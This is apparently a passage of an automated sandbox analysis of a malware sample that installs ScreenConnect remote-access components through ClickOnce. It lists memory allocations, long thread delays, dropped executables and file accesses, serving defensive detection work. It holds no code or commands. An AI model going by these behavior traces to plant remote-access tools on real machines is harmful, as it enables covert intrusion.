                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 1BCBC550000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeMemory allocated: A70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeMemory allocated: 1A560000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMemory allocated: 30A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMemory allocated: 50A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599762Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599497Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599389Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599053Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598382Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597697Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597473Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597233Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597119Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596139Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595809Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595683Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595576Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595351Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595007Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594233Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593796Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2223Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 7455Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe TID: 7116Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599762s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599655s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599497s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599389s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599280s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599171s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599053s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598921s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598812s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598563s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598382s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597697s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597593s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597473s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597233s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597119s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596796s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596577s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596249s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596139s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596031s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595921s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595809s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595683s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595576s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595351s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595007s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594671s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594233s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594124s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -593906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -593796s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe TID: 6952Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe TID: 6876Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe TID: 7136Thread sleep count: 204 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A4B9B FindFirstFileExA,0_2_003A4B9B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599762Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599655Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599497Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599389Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599053Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598382Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597697Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597473Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597233Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597119Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596139Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595921Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595809Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595683Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595576Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595351Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595007Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594233Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593796Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\Jump to behavior
